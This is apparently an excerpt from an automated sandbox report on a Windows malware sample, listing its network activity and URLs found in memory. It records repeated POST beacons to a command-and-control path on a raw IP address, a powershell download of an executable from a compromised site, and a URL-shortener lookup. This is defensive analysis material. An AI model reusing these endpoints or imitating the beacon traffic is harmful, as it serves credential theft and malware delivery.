                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: unknownTCP traffic detected without corresponding DNS query: 185.206.215.56
                Source: unknownTCP traffic detected without corresponding DNS query: 185.206.215.56
                Source: unknownTCP traffic detected without corresponding DNS query: 185.206.215.56
                Source: unknownTCP traffic detected without corresponding DNS query: 185.206.215.56
                Source: unknownTCP traffic detected without corresponding DNS query: 185.206.215.56
                Source: unknownTCP traffic detected without corresponding DNS query: 185.206.215.56
                Source: unknownTCP traffic detected without corresponding DNS query: 185.206.215.56
                Source: unknownTCP traffic detected without corresponding DNS query: 185.206.215.56
                Source: unknownTCP traffic detected without corresponding DNS query: 185.206.215.56
                Source: unknownTCP traffic detected without corresponding DNS query: 185.206.215.56
                Source: unknownTCP traffic detected without corresponding DNS query: 185.206.215.56
                Source: unknownTCP traffic detected without corresponding DNS query: 185.206.215.56
                Source: unknownTCP traffic detected without corresponding DNS query: 185.206.215.56
                Source: unknownTCP traffic detected without corresponding DNS query: 185.206.215.56
                Source: unknownTCP traffic detected without corresponding DNS query: 185.206.215.56
                Source: unknownTCP traffic detected without corresponding DNS query: 185.206.215.56
                Source: unknownTCP traffic detected without corresponding DNS query: 185.206.215.56
                Source: unknownTCP traffic detected without corresponding DNS query: 185.206.215.56
                Source: unknownTCP traffic detected without corresponding DNS query: 185.206.215.56
                Source: unknownTCP traffic detected without corresponding DNS query: 185.206.215.56
                Source: unknownTCP traffic detected without corresponding DNS query: 185.206.215.56
                Source: unknownTCP traffic detected without corresponding DNS query: 185.206.215.56
                Source: unknownTCP traffic detected without corresponding DNS query: 185.206.215.56
                Source: unknownTCP traffic detected without corresponding DNS query: 185.206.215.56
                Source: unknownTCP traffic detected without corresponding DNS query: 185.206.215.56
                Source: unknownTCP traffic detected without corresponding DNS query: 185.206.215.56
                Source: unknownTCP traffic detected without corresponding DNS query: 185.206.215.56
                Source: unknownTCP traffic detected without corresponding DNS query: 185.206.215.56
                Source: unknownTCP traffic detected without corresponding DNS query: 185.206.215.56
                Source: unknownTCP traffic detected without corresponding DNS query: 185.206.215.56
                Source: unknownTCP traffic detected without corresponding DNS query: 185.206.215.56
                Source: unknownTCP traffic detected without corresponding DNS query: 185.206.215.56
                Source: unknownTCP traffic detected without corresponding DNS query: 185.206.215.56
                Source: unknownTCP traffic detected without corresponding DNS query: 185.206.215.56
                Source: unknownTCP traffic detected without corresponding DNS query: 185.206.215.56
                Source: unknownTCP traffic detected without corresponding DNS query: 185.206.215.56
                Source: unknownTCP traffic detected without corresponding DNS query: 185.206.215.56
                Source: unknownTCP traffic detected without corresponding DNS query: 185.206.215.56
                Source: unknownTCP traffic detected without corresponding DNS query: 185.206.215.56
                Source: unknownTCP traffic detected without corresponding DNS query: 185.206.215.56
                Source: unknownTCP traffic detected without corresponding DNS query: 185.206.215.56
                Source: unknownTCP traffic detected without corresponding DNS query: 185.206.215.56
                Source: unknownTCP traffic detected without corresponding DNS query: 185.206.215.56
                Source: unknownTCP traffic detected without corresponding DNS query: 185.206.215.56
                Source: unknownTCP traffic detected without corresponding DNS query: 185.206.215.56
                Source: unknownTCP traffic detected without corresponding DNS query: 185.206.215.56
                Source: unknownTCP traffic detected without corresponding DNS query: 185.206.215.56
                Source: unknownTCP traffic detected without corresponding DNS query: 185.206.215.56
                Source: unknownTCP traffic detected without corresponding DNS query: 185.206.215.56
                Source: unknownTCP traffic detected without corresponding DNS query: 185.206.215.56
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 17_2_00404ED4 recv,17_2_00404ED4
                Source: global trafficHTTP traffic detected: GET /wp-content/themes/index/QPR-3067.exe HTTP/1.1Host: bighoreca.nlConnection: Keep-Alive
                Source: powershell.exe, 00000006.00000002.2103852429.000000001CD80000.00000002.00000001.sdmp, 12.exe, 0000000B.00000002.2187386267.0000000008780000.00000002.00000001.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
                Source: powershell.exe, 00000006.00000002.2098054472.000000000020E000.00000004.00000020.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
                Source: unknownDNS traffic detected: queries for: cutt.ly
                Source: unknownHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 176Connection: close
                Source: powershell.exe, 00000006.00000002.2098054472.000000000020E000.00000004.00000020.sdmpString found in binary or memory: http://acraiz.icpbrasil.gov.br/DPCacraiz.pdf0=
                Source: powershell.exe, 00000006.00000002.2098054472.000000000020E000.00000004.00000020.sdmpString found in binary or memory: http://acraiz.icpbrasil.gov.br/LCRacraiz.crl0
                Source: powershell.exe, 00000006.00000002.2102568454.0000000003688000.00000004.00000001.sdmpString found in binary or memory: http://bighoreca.nl
                Source: powershell.exe, 00000006.00000002.2102568454.0000000003688000.00000004.00000001.sdmpString found in binary or memory: http://bighoreca.nl/wp-content/themes/index/QPR-3067.exe
                Source: powershell.exe, 00000006.00000002.2103652511.000000001B830000.00000004.00000001.sdmpString found in binary or memory: http://ca.disig.sk/ca/crl/ca_disig.crl0
                Source: powershell.exe, 00000006.00000002.2103765249.000000001B907000.00000004.00000001.sdmpString found in binary or memory: http://ca.sia.it/seccli/repository/CRL.der0J
                Source: powershell.exe, 00000006.00000003.2095044902.000000001D16B000.00000004.00000001.sdmpString found in binary or memory: http://ca.sia.it/secsrv/repository/CRL.der0J
                Source: powershell.exe, 00000006.00000002.2102583791.00000000036A6000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCA-1.crt0
                Source: powershell.exe, 00000006.00000002.2102583791.00000000036A6000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                Source: powershell.exe, 00000006.00000002.2102583791.00000000036A6000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertEVCodeSigningCA-SHA2.crt0
                Source: powershell.exe, 00000006.00000002.2102568454.0000000003688000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.rapidssl.com/RapidSSLTLSRSACAG1.crt0
                Source: powershell.exe, 00000006.00000002.2102568454.0000000003688000.00000004.00000001.sdmpString found in binary or memory: http://cdp.rapidssl.com/RapidSSLTLSRSACAG1.crl0L
                Source: powershell.exe, 00000006.00000002.2105871443.000000001D196000.00000004.00000001.sdmpString found in binary or memory: http://certificates.starfieldtech.com/repository/1604
                Source: powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmpString found in binary or memory: http://cps.chambersign.org/cps/chambersignroot.html0
                Source: powershell.exe, 00000006.00000002.2098054472.000000000020E000.00000004.00000020.sdmpString found in binary or memory: http://cps.chambersign.org/cps/chambersroot.html0
                Source: powershell.exe, 00000006.00000002.2098054472.000000000020E000.00000004.00000020.sdmpString found in binary or memory: http://cps.chambersign.org/cps/publicnotaryroot.html0
                Source: powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmpString found in binary or memory: http://crl.chambersign.org/chambersignroot.crl0
                Source: powershell.exe, 00000006.00000002.2098054472.000000000020E000.00000004.00000020.sdmpString found in binary or memory: http://crl.chambersign.org/chambersroot.crl0
                Source: powershell.exe, 00000006.00000002.2098054472.000000000020E000.00000004.00000020.sdmpString found in binary or memory: http://crl.chambersign.org/publicnotaryroot.crl0
                Source: powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                Source: powershell.exe, 00000006.00000003.2095044902.000000001D16B000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/COMODOCertificationAuthority.crl0
                Source: powershell.exe, 00000006.00000003.2095044902.000000001D16B000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/TrustedCertificateServices.crl0:
                Source: powershell.exe, 00000006.00000002.2098054472.000000000020E000.00000004.00000020.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
                Source: powershell.exe, 00000006.00000002.2103729703.000000001B8CC000.00000004.00000001.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
                Source: powershell.exe, 00000006.00000002.2103702990.000000001B893000.00000004.00000001.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
                Source: powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                Source: powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmpString found in binary or memory: http://crl.netsolssl.com/NetworkSolutionsCertificateAuthority.crl0
                Source: powershell.exe, 00000006.00000003.2095044902.000000001D16B000.00000004.00000001.sdmpString found in binary or memory: http://crl.oces.certifikat.dk/oces.crl0
                Source: powershell.exe, 00000006.00000002.2098054472.000000000020E000.00000004.00000020.sdmpString found in binary or memory: http://crl.pki.wellsfargo.com/wsprca.crl0
                Source: powershell.exe, 00000006.00000002.2103702990.000000001B893000.00000004.00000001.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
                Source: powershell.exe, 00000006.00000002.2103702990.000000001B893000.00000004.00000001.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
                Source: powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmpString found in binary or memory: http://crl.securetrust.com/SGCA.crl0
                Source: powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmpString found in binary or memory: http://crl.securetrust.com/STCA.crl0
                Source: powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmpString found in binary or memory: http://crl.ssc.lt/root-a/cacrl.crl0
                Source: powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmpString found in binary or memory: http://crl.ssc.lt/root-b/cacrl.crl0
                Source: powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmpString found in binary or memory: http://crl.ssc.lt/root-c/cacrl.crl0
                Source: powershell.exe, 00000006.00000003.2095044902.000000001D16B000.00000004.00000001.sdmpString found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl0
                Source: powershell.exe, 00000006.00000002.2102583791.00000000036A6000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDCA-1.crl08
                Source: powershell.exe, 00000006.00000002.2102583791.00000000036A6000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0:
                Source: powershell.exe, 00000006.00000002.2102568454.0000000003688000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0c
                Source: powershell.exe, 00000006.00000002.2102583791.00000000036A6000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/EVCodeSigningSHA2-g1.crl07
                Source: powershell.exe, 00000006.00000002.2102583791.00000000036A6000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDCA-1.crl0w
                Source: powershell.exe, 00000006.00000002.2102583791.00000000036A6000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0
                Source: powershell.exe, 00000006.00000002.2102583791.00000000036A6000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/EVCodeSigningSHA2-g1.crl0K
                Source: powershell.exe, 00000006.00000002.2103765249.000000001B907000.00000004.00000001.sdmp, powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmp, powershell.exe, 00000006.00000002.2103702990.000000001B893000.00000004.00000001.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/DF3C24F9BFD666761B268073FE06D
                Source: powershell.exe, 00000006.00000002.2103652511.000000001B830000.00000004.00000001.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabn
                Source: powershell.exe, 00000006.00000002.2098107246.000000000025D000.00000004.00000020.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/enf
                Source: powershell.exe, 00000006.00000003.2095044902.000000001D16B000.00000004.00000001.sdmpString found in binary or memory: http://fedir.comsign.co.il/cacert/ComSignAdvancedSecurityCA.crt0
                Source: powershell.exe, 00000006.00000003.2095044902.000000001D16B000.00000004.00000001.sdmpString found in binary or memory: http://fedir.comsign.co.il/crl/ComSignAdvancedSecurityCA.crl0
                Source: powershell.exe, 00000006.00000003.2095044902.000000001D16B000.00000004.00000001.sdmpString found in binary or memory: http://fedir.comsign.co.il/crl/ComSignCA.crl0
                Source: powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmpString found in binary or memory: http://fedir.comsign.co.il/crl/ComSignSecuredCA.crl0
                Source: powershell.exe, 00000006.00000002.2103852429.000000001CD80000.00000002.00000001.sdmp, 12.exe, 0000000B.00000002.2187386267.0000000008780000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com
                Source: powershell.exe, 00000006.00000002.2103852429.000000001CD80000.00000002.00000001.sdmp, 12.exe, 0000000B.00000002.2187386267.0000000008780000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com/
                Source: powershell.exe, 00000006.00000002.2104088848.000000001CF67000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
                Source: powershell.exe, 00000006.00000002.2104088848.000000001CF67000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
                Source: powershell.exe, 00000006.00000002.2103702990.000000001B893000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                Source: powershell.exe, 00000006.00000002.2103702990.000000001B893000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
                Source: powershell.exe, 00000006.00000002.2103702990.000000001B893000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
                Source: powershell.exe, 00000006.00000002.2098054472.000000000020E000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
                Source: powershell.exe, 00000006.00000002.2103702990.000000001B893000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com05
                Source: powershell.exe, 00000006.00000002.2102583791.00000000036A6000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0A
                Source: powershell.exe, 00000006.00000002.2102568454.0000000003688000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0B
                Source: powershell.exe, 00000006.00000002.2102583791.00000000036A6000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0C
                Source: powershell.exe, 00000006.00000002.2102583791.00000000036A6000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0H
                Source: powershell.exe, 00000006.00000002.2103702990.000000001B893000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.entrust.net03
                Source: powershell.exe, 00000006.00000002.2103729703.000000001B8CC000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.entrust.net0D
                Source: powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.infonotary.com/responder.cgi0V
                Source: powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.pki.gva.es0
                Source: powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmpString found in binary or memory: http://pki-root.ecertpki.cl/CertEnroll/E-CERT%20ROOT%20CA.crl0
                Source: powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmpString found in binary or memory: http://repository.infonotary.com/cps/qcps.html0$
                Source: powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmpString found in binary or memory: http://repository.swisssign.com/0
                Source: powershell.exe, 00000006.00000002.2098764453.0000000002330000.00000002.00000001.sdmp, powershell.exe, 00000008.00000002.2135210182.0000000002380000.00000002.00000001.sdmp, powershell.exe, 00000009.00000002.2149819469.0000000002360000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
                Source: powershell.exe, 00000006.00000002.2107223409.000000001D360000.00000002.00000001.sdmpString found in binary or memory: http://servername/isapibackend.dll
                Source: powershell.exe, 00000006.00000002.2104088848.000000001CF67000.00000002.00000001.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
                Source: powershell.exe, 00000006.00000002.2102568454.0000000003688000.00000004.00000001.sdmpString found in binary or memory: http://status.rapidssl.com0
                Source: powershell.exe, 00000006.00000002.2104088848.000000001CF67000.00000002.00000001.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
                Source: powershell.exe, 00000006.00000002.2098764453.0000000002330000.00000002.00000001.sdmp, powershell.exe, 00000008.00000002.2135210182.0000000002380000.00000002.00000001.sdmp, powershell.exe, 00000009.00000002.2149819469.0000000002360000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
                Source: powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmpString found in binary or memory: http://www.a-cert.at/certificate-policy.html0
                Source: powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmpString found in binary or memory: http://www.a-cert.at/certificate-policy.html0;
                Source: powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmpString found in binary or memory: http://www.a-cert.at0E
                Source: powershell.exe, 00000006.00000002.2098054472.000000000020E000.00000004.00000020.sdmpString found in binary or memory: http://www.acabogacia.org/doc0
                Source: powershell.exe, 00000006.00000002.2098054472.000000000020E000.00000004.00000020.sdmpString found in binary or memory: http://www.acabogacia.org0
                Source: powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmpString found in binary or memory: http://www.ancert.com/cps0
                Source: powershell.exe, 00000006.00000003.2095044902.000000001D16B000.00000004.00000001.sdmpString found in binary or memory: http://www.certicamara.com/certicamaraca.crl0
